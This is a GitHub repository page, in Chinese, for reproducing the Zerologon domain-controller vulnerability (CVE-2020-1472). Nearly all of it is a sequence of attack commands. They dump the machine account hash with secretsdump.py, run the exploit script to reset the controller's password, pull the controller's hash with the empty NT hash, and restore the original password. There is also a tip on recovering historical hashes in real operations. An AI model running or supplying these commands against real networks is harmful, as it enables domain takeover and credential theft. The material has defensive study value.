Skip to content

NAXG/CVE-2020-1472

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

复现完了有点小BUG,重启后会卡在登录页面比较久。不知道是不是只有我会。(谨慎在真实环境利用) 实战中可以使用secretsdump.py 的 -use-vss和-history获取历史hash进行恢复.

第一步

pip3 install -r requirements.txt

查看hash

secretsdump.py molecule-labs.com/administrator:Aa123456.@192.168.175.132 -just-dc-user 'AD$'

images

攻击

python3 CVE-2020-1472.py AD AD$ 192.168.175.132

images

查询域控hash

secretsdump.py molecule-labs.com/'AD$'@192.168.175.132 -just-dc-user 'AD$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

images

恢复hash

python3 reinstall_original_pw.py AD 192.168.175.132 061e8e521872fa93a2f8d89ca0683145

images

查询恢复后的hash

secretsdump.py molecule-labs.com/administrator:Aa123456.@192.168.175.132 -just-dc-user 'AD$'

images

脚本来源 https://github.com/blackarrowsec/redteam-research

https://github.com/dirkjanm/CVE-2020-1472

https://github.com/SecuraBV/CVE-2020-1472

About

CVE-2020-1472复现流程

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages